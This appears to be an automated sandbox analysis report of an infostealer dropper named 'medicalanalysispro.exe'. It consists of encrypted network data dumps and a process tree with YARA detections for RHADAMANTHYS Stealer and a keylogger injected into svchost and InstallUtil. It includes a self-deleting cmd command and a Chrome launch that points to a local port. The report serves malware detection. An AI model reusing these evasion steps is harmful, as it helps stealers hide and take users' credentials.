                                                                                                                                                                                                                                                                                                            Data Ascii: arzL/,|4@wmKwz;-[,^PF1XKxCI~QQDpLF(%KHK``*,Z7Y2?@dHircJ{qGX1_z]yYG2a]ekM+Nh{IX9w0;Q}^.)VyA_z0(L
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:06 UTC16384INData Raw: 04 a9 bd c6 3d 44 82 27 9e 5c 93 d6 b8 30 70 02 e7 00 d0 c8 91 1e 76 fa 11 7d aa b2 5c d1 7d 10 42 b1 66 54 74 4b 9a 3e 92 f0 26 7c 9a d9 77 92 48 27 ae f4 5d 67 15 4a f7 c1 27 85 f7 c8 5b 1a 5b 0c 39 45 a3 bb 5c 3c 27 90 87 ee 35 1c 06 81 2e 44 36 b3 f2 70 8d 78 0a 6c 4a f6 f4 ba 2c 62 d1 a7 06 ed d5 f6 5e 46 7e 43 d8 52 8e 5e a7 ef 90 6b 82 04 6b e4 d1 70 1a b0 a4 9e 83 84 be d4 9b 8b 9c 14 11 6e 92 58 81 a3 bd 3b f6 0e 26 ec d9 fe 3e d8 e2 dc 0f 2a 2b 9e 17 e4 ca 9f 72 48 f9 d6 34 8e 52 e9 70 f6 0b b3 96 48 7f 39 f5 89 a5 a5 6c 76 f2 d7 1f e1 f6 20 10 61 36 6a 58 b6 dd 7c 81 70 bd 28 4d 99 8d e4 e2 03 5c 20 ca d4 49 cd 6d b3 15 4a 9e ae da b5 b3 92 12 13 39 99 9f 7f bf fe 97 9e 07 af e9 5e 63 8e d0 1e 1b 13 8d a2 b1 4e 1c 06 45 93 1f 6a fc 5f 96 db f2
                                                                                                                                                                                                                                                                                                            Data Ascii: =D'\0pv}\}BfTtK>&|wH']gJ'[[9E\<'5.D6pxlJ,b^F~CR^kkpnX;&>*+rH4RpH9lv a6jX|p(M\ ImJ9^cNEj_
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:06 UTC16384INData Raw: d2 2a a2 85 b1 76 9d 89 46 7e 23 2b 1f f3 f4 a0 da 60 46 13 e1 0d 4f ef c4 27 6b 36 80 80 3e 3b 78 bf f9 04 64 25 6b 90 3d df cd 01 39 2c 48 f9 2b d4 31 b1 a8 a8 3c cc 27 8a e2 75 c3 d7 82 6c 8e 1f 5c 39 15 ce bb 05 ec 21 1c 1e 8f 09 4d 3f ac 84 c6 57 2e d2 01 7c 3b ae 10 d7 43 51 5c a9 a4 5e d4 93 96 77 0c fe 3f ae bf 82 dd 0b f5 5a 0b 18 48 b1 fb 82 bd 6d c7 6e 37 fe b3 0e 47 97 df a2 f9 e7 f2 b9 c0 fc e9 41 0b ab c7 02 bf b0 a3 e2 9b f6 31 f7 d7 ef 5b cd b4 cd d1 fc 10 e4 11 e5 8a 38 f4 c1 17 f5 27 e9 17 33 7c 82 24 a3 ef 3e 84 ff b9 67 b5 d2 45 95 d1 fc ec 59 68 e4 be 12 03 a7 94 6a 0f cc 13 b5 89 85 0f 40 ab 34 95 78 bb 02 0d b7 d2 d8 48 c7 12 f9 f0 ee 51 f6 c3 09 ef 19 d1 06 aa 1c eb 93 d2 dc c5 01 e3 f5 63 cd 5d 82 59 5f 4d 32 fa 58 db 3f 7d 09 a6
                                                                                                                                                                                                                                                                                                            Data Ascii: *vF~#+`FO'k6>;xd%k=9,H+1<'ul\9!M?W.|;CQ\^w?ZHmn7GA1[8'3|$>gEYhj@4xHQc]Y_M2X?}
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: a8 63 04 da f3 ff 3e 78 53 59 c4 0b 62 c2 4d d1 f6 0d a0 c2 a6 9b 15 71 bf 81 80 3d b6 e5 5c 5c 7d 47 ef 67 35 38 41 08 3a 8a df 9a a0 f3 40 7b c5 40 1d 72 62 45 76 2d 07 d5 c6 04 48 85 59 63 98 7d f9 54 d0 b0 52 0b 2e 1d af 57 40 7c 63 07 61 c0 f7 50 1a ac 37 3c ff 26 d3 10 8f 30 83 ae 6d 0c 12 08 b9 2e 84 9c 1c ce d3 aa ed 3f db 77 5a 2b b9 ae dc b9 a2 f8 3e fb 06 c6 6a cd 69 42 a7 4d 95 ad 4e 85 2d 44 ed 9a 84 e9 e8 dd 66 5d bc 35 24 e5 07 58 73 8f 9c 00 2b fc 2f 41 b7 50 93 35 25 a2 60 30 7e bd bc 6f 9a 1f 84 57 aa eb f2 ee c6 2e 1f bf e3 5f 3f 76 9f f6 1b 93 60 dd 9a 11 7a a3 2c 63 25 ad 59 87 55 b8 dd 3c 86 f4 b5 1a 30 18 fd 81 b9 b6 fd fc c2 4c a7 fb 64 16 10 eb ce 14 2d f4 60 9e 75 ee c0 80 c8 14 3c 83 4e 47 0c de 96 8a 4b ee 07 46 2b 94 40 59 5d
                                                                                                                                                                                                                                                                                                            Data Ascii: c>xSYbMq=\\}Gg58A:@{@rbEv-HYc}TR.W@|caP7<&0m.?wZ+>jiBMN-Df]5$Xs+/AP5%`0~oW._?v`z,c%YU<0Ld-`u<NGKF+@Y]
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: fb e8 42 ce e9 c4 ed 62 c6 17 1f 8c ec af 52 ac b8 8f 48 06 b4 8a 17 1b 77 21 07 75 4e 1b 40 5b 70 48 76 a6 7b 25 ad 7d c1 2c 17 8c a6 54 f2 6a 62 0a cc 35 73 b9 41 a2 34 55 60 92 69 24 de 55 99 fb 5e 19 7f 8f 40 59 8e 5d 50 cb fc aa e5 bc c0 9b 74 27 33 24 f5 c0 6e 5c f7 37 ee a1 e9 13 be 35 31 47 13 f3 ff b6 b6 08 1f 38 1b ed 8b a7 83 fc 02 e4 c1 8c 6a c5 2f cd a0 e4 93 72 4d bb 3a a8 77 fa b6 cf 86 aa 9f 77 9d ae 2d ab 0f 21 f0 ec 19 6e 5e 9f 3f 3e e9 d2 56 52 30 bf d6 dc 80 85 86 41 8f f4 44 59 17 c7 44 03 79 37 25 ab 4e 07 f5 bf d8 4c a0 b0 55 e3 8b c0 95 b9 27 9f 4c 7c 25 75 2b 5e 7c 8e 3e 50 3d 63 43 e7 28 b6 de 9f ae 19 58 f5 e9 b1 70 ad da 55 19 1c 05 58 c8 9b 49 5b 29 65 5f 48 8f fb 5b 83 8e fc dd 16 60 d9 4b a1 3b 25 01 78 6b df b8 79 8c 28 e9
                                                                                                                                                                                                                                                                                                            Data Ascii: BbRHw!uN@[pHv{%},Tjb5sA4U`i$U^@Y]Pt'3$n\751G8j/rM:ww-!n^?>VR0ADYDy7%NLU'L|%u+^|>P=cC(XpUXI[)e_H[`K;%xky(
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: 66 74 a0 2a 74 a1 26 b1 ff c3 e4 34 99 c7 f3 e6 e5 4a 9b 33 5f c7 de 47 65 0b c1 25 43 74 e8 4b 56 b6 c2 fc 9b da fa a8 a2 6e 66 0a 06 ea 6d 75 e9 16 cc cc 66 e7 5e 34 1a b8 d5 0e d0 3f da 5a 77 8c ed 2a a7 45 91 22 89 37 ed 08 b2 37 00 b8 03 cb 72 2e 86 50 8b a7 72 d7 8a ec 15 97 05 8c 63 5f 37 4a 0f cd 66 7e 2d 80 27 2a ee 5d 84 26 0a a4 d7 0a fd 8d b7 9b ef bc 87 f3 d3 0c eb b4 a2 c3 0e db 4f b5 9c bc 14 bf c6 96 09 ad 88 9a 6f 03 b5 a1 3f de af b5 1c 88 ba a9 8c 79 a6 5e 70 aa a4 74 d7 68 53 90 40 7c 65 01 ee 6a 0d 5b 05 87 c0 2c c4 b8 20 2b b5 bc 35 6a bf 22 ea be 0b c3 40 28 b3 e6 68 db 4d ea 24 10 d8 0c 83 53 1d 4e fa 87 0e 22 fa cd 5a 4d 6c e1 14 7a e1 1d c8 37 1f a5 90 a1 bd 37 da 02 71 4f 71 34 2f ed 7d 8e 34 ea a8 ef e0 a0 cf 72 f1 76 df a8 39
                                                                                                                                                                                                                                                                                                            Data Ascii: ft*t&4J3_Ge%CtKVnfmuf^4?Zw*E"77r.Prc_7Jf~-'*]&Oo?y^pthS@|ej[, +5j"@(hM$SN"ZMlz77qOq4/}4rv9
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: 9f 27 28 f2 79 f7 2f 03 2b 57 af 46 26 29 e1 99 6f 48 23 2f c5 58 fc a5 5c 07 ef 73 34 5c 3b fb 68 3f 01 8b c4 db 11 67 6f e7 8a cb c7 b6 ad ec a0 72 02 82 84 73 77 d8 cb 5c 0b 8c 80 f6 80 2c 00 23 5f 1a 97 d4 b6 a9 82 8b cc 1b ef 23 da f3 0f 9b cb 44 19 62 ad 1f ba aa 81 cc 80 b4 c2 31 7f 07 25 0f 1f 04 6b 41 5a 98 68 5e 77 8c 6e b4 69 36 a5 38 ec 11 59 ad 5c 23 b3 ab 49 be 07 be 3e 89 fc 36 68 e7 11 af 29 98 ef 2a 4d 1b ae 84 fe eb 3d 1e e3 3f dc 84 43 31 a9 41 34 87 f6 c7 c6 ca e2 36 3a 30 d3 b2 5f d4 d7 92 34 5d 5d 6c f4 6a 38 06 ae cc ed b1 18 46 df 06 d5 0c b3 d3 1b aa d7 d4 b7 64 37 d0 da 8e 13 db 46 57 1f 2c 3a dd 38 c3 13 39 13 49 7a 01 9c ce f5 9c 29 de da a4 35 54 34 22 40 c8 67 89 99 19 5d 76 26 ec cd 34 e9 83 0a 91 c2 68 6f d1 0a b6 0f e6 99
                                                                                                                                                                                                                                                                                                            Data Ascii: '(y/+WF&)oH#/X\s4\;h?gorsw\,#_#Db1%kAZh^wni68Y\#I>6h)*M=?C1A46:0_4]]lj8Fd7FW,:89Iz)5T4"@g]v&4ho
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: a0 e8 a0 4e eb 5c bb 2f bb 4c 44 38 47 f3 01 7e 2b 53 c2 6a f4 5d bd 63 05 76 60 d0 f7 e0 36 02 38 cd 14 c5 9b 06 a5 c1 5f 3a 04 ea 98 32 4f 71 4d a5 2f 41 23 20 d5 7a 80 25 e2 4f c0 c2 9f 98 d3 8c fb 1b ae 5e 93 a9 dd b9 64 8d 56 37 ec 23 34 53 25 91 a7 97 24 38 30 ad 92 0b 66 94 92 d0 a4 db e4 d1 62 9c f8 a3 9f c1 15 e0 8a 5c 26 59 9e 42 80 50 41 25 14 11 ff d6 78 32 80 d2 a4 d0 f8 81 7a 91 22 64 25 1e 87 c6 99 0b b7 bb e3 57 55 eb 52 27 eb bb 09 fe 64 8a 85 29 1f e6 ef 0d b1 a7 d2 44 3e 83 26 ad 3a c8 b0 47 80 48 e1 d8 a0 4b ee 17 6c 25 d3 89 97 25 ab 71 ce 8b d1 3f 42 c7 31 2e 03 65 8a 19 ce 2f c9 4c 49 ac 87 5d a4 91 b7 71 03 17 bf 0b 8e c8 e1 e8 d6 4a bf 67 67 94 ab e3 24 0e e1 fb ca 03 98 b1 da 7e 8a 39 6f 80 67 3d 3e 7f 0f 07 30 1f f0 09 07 9e 24
                                                                                                                                                                                                                                                                                                            Data Ascii: N\/LD8G~+Sj]cv`68_:2OqM/A# z%O^dV7#4S%$80fb\&YBPA%x2z"d%WUR'd)D>&:GHKl%%q?B1.e/LI]qJgg$~9og=>0$
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: c5 9d f5 be dd a1 80 3d d3 cb cb a9 42 7a 1a ab f8 fa c7 12 dd b6 7d 60 3e f2 13 9a cb 3d b3 4e d1 16 b9 8b 0b 14 56 a8 33 97 be 34 da e1 19 f4 28 e4 ff 35 e6 3d ec 0d 3d c1 2e de 3a ed 45 a0 0b fa 3a f7 5a 06 e0 b7 3f 38 ac 98 00 6f 85 2d 33 80 a8 c8 34 46 85 88 93 60 62 45 0a f0 6a 30 81 2b 14 3d d2 d6 19 73 ea 60 33 fb 4b 51 bf 31 ed 47 b3 5f 64 4a f9 df 96 0d cf 0f 3a e6 75 38 25 6f 96 9d ec 53 e6 b7 23 be 79 9c 75 74 1e ab a0 a2 80 24 3c 20 59 a2 93 d4 1e ee 70 38 1b c0 ef 45 03 36 3e f4 a2 c9 22 85 d4 29 50 a7 5c 0f 70 4a ba 5b fa 22 55 80 18 4e 95 ea ee 92 55 3c 28 2e aa 97 b7 50 0a 95 3e e4 a9 24 a0 da 9a c9 97 83 53 f5 77 8d 98 ff a6 60 21 d8 6f 0b 0a 81 2a 77 d9 f7 da af 0d 60 f8 15 d2 3a f0 90 ca f0 99 ab 8c 9e 9e 47 c7 6e 2a 0d 0c e9 3d ab be
                                                                                                                                                                                                                                                                                                            Data Ascii: =Bz}`>=NV34(5==.:E:Z?8o-34F`bEj0+=s`3KQ1G_dJ:u8%oS#yut$< Yp8E6>")P\pJ["UNU<(.P>$Sw`!o*w`:Gn*=
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:07 UTC16384INData Raw: ae fc e4 9a 9e e3 74 fa 8d b0 da 22 36 04 f4 66 2c 87 1a a2 c7 e8 61 6f 01 6b 4c 67 1a b0 ca 9b 11 f2 a9 f3 ae 2e 1c 19 c0 8a 1b 06 e6 94 5c 53 ca e1 58 06 e9 5b dc 2b 0b ce 17 4f a6 98 7c 5c fc e9 ee 78 c6 72 7d 9f 85 c8 69 a1 a8 27 62 7d 9a 81 cb 3f e2 5a 5b 46 d5 cf 86 7a 4d 75 00 31 d4 cf 01 36 b1 a3 df 9a 95 ef 5f 9e 17 fe 27 49 bf 82 06 09 57 e6 55 7e 27 83 ef 88 4b 94 d9 4c ee 47 9e 3b 87 5a 36 ae 2a ae 24 fe 25 32 6e ef cb 9e fb 09 49 36 85 05 10 5f 96 d3 6f 53 11 0c 82 c4 0a 46 c0 b8 3d dc f1 e7 41 aa 4d b0 a6 e6 e7 11 3c 8b 6a 3a cc df 1d 14 4d 5f 4e 05 d3 13 ed 3a 36 81 32 61 2a e4 cb 7f f7 ec a0 13 7a 7b 39 22 f8 29 7d e4 43 b3 de 48 ee b3 3a 2c a8 22 80 17 bb 03 84 99 b4 da c6 94 5b 07 6c f0 da 9c 13 d1 47 fb 83 33 8c 0b 4a b6 b0 db c1 75 53
                                                                                                                                                                                                                                                                                                            Data Ascii: t"6f,aokLg.\SX[+O|\xr}i'b}?Z[FzMu16_'IWU~'KLG;Z6*$%2nI6_oSF=AM<j:M_N:62a*z{9")}CH:,"[lG3JuS


                                                                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                                                            Start time:17:56:03
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\medicalanalysispro.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7bde70000
                                                                                                                                                                                                                                                                                                            File size:206'336 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:178A2A89CB76EFEA6DF50CC884991226
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                                                                            Start time:17:56:03
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                                                                                                                                                                                                                                                                                                            Imagebase:0x40000
                                                                                                                                                                                                                                                                                                            File size:93'696 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:443B43ADCB78164D40C977ABAC54C18E
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2229000559.0000000005840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                                                                            Start time:17:56:16
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff63b900000
                                                                                                                                                                                                                                                                                                            File size:71'680 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                                                                            Start time:17:56:52
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xc30000
                                                                                                                                                                                                                                                                                                            File size:42'064 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000006.00000002.2233485243.00000000012A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                                                                            Start time:17:56:54
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xe0000
                                                                                                                                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.2228716630.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000002.2329064094.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                                                                            Start time:17:56:54
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            Imagebase:0x50000
                                                                                                                                                                                                                                                                                                            File size:25'600 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:2DBC39DCE4C3B66019E84A28A342EAD0
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                                                                            Start time:17:56:54
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 324
                                                                                                                                                                                                                                                                                                            Imagebase:0x880000
                                                                                                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                                                                            Start time:17:56:55
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                                                                            Start time:17:56:55
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                                                                            Start time:17:56:55
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:timeout 1
                                                                                                                                                                                                                                                                                                            Imagebase:0xc00000
                                                                                                                                                                                                                                                                                                            File size:25'088 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                                                                            Start time:17:57:04
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                                                                            Start time:17:57:18
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr7A3F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/299e36a8/4a1b3c1a"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                                                                            Start time:17:57:19
                                                                                                                                                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=1988,i,17588482768743523703,9612688195532631865,262144 /prefetch:8
